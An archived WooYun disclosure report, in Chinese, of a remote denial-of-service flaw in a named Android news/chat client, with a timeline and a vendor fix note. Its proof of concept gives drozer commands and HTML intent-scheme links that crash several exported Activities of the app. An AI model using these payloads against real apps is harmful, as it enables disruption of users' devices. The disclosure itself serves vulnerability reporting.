乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-12: 细节已通知厂商并且等待厂商处理中 2015-06-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-08-11: 细节向核心白帽子及相关领域专家公开 2015-08-21: 细节向普通白帽子公开 2015-08-31: 细节向实习白帽子公开 2015-09-15: 细节向公众公开
客户端远程拒绝服务
## 1 ## 客户端版本最新版:v2.0.4## 2 ## 多个Activity组件存在该问题,可以远程触发
cn.com.voc.mobile.liaoliao.ChatActivitycn.com.voc.android.oasdk.OAListActivitycn.com.voc.android.oasdk.OAList2Activitycn.com.voc.android.oasdk.WebActivitycn.com.voc.android.oasdk.FilebrowerActivity
## 3 ## 直接调用以上Activity,客户端崩溃
## POC ##(1)本地利用,drozer
dz> run app.activity.start --component cn.com.voc.mobile.liaoliao cn.com.voc.mobile.liaoliao.ChatActivitydz> run app.activity.start --component cn.com.voc.mobile.liaoliao cn.com.voc.android.oasdk.OAListActivitydz> run app.activity.start --component cn.com.voc.mobile.liaoliao cn.com.voc.android.oasdk.OAList2Activitydz> run app.activity.start --component cn.com.voc.mobile.liaoliao cn.com.voc.android.oasdk.WebActivitydz> run app.activity.start --component cn.com.voc.mobile.liaoliao cn.com.voc.android.oasdk.FilebrowerActivity
(2)远程利用,IntentScheme
<a href="intent:#Intent;component=cn.com.voc.mobile.liaoliao/cn.com.voc.mobile.liaoliao.ChatActivity;end">START: cn.com.voc.mobile.liaoliao.ChatActivity</a><br><a href="intent:#Intent;component=cn.com.voc.mobile.liaoliao/cn.com.voc.android.oasdk.OAListActivity;end">START: cn.com.voc.android.oasdk.OAListActivity</a><br><a href="intent:#Intent;component=cn.com.voc.mobile.liaoliao/cn.com.voc.android.oasdk.OAList2Activity;end">START: cn.com.voc.android.oasdk.OAList2Activity</a><br><a href="intent:#Intent;component=cn.com.voc.mobile.liaoliao/cn.com.voc.android.oasdk.WebActivity;end">START: cn.com.voc.android.oasdk.WebActivity</a><br><a href="intent:#Intent;component=cn.com.voc.mobile.liaoliao/cn.com.voc.android.oasdk.FilebrowerActivity;end">START: cn.com.voc.android.oasdk.FilebrowerActivity</a><br>
注意异常intent的处理
危害等级:无影响厂商忽略
忽略时间:2015-09-15 14:58
漏洞Rank:2 (WooYun评价)
2015-06-23:问题已修正,谢谢支持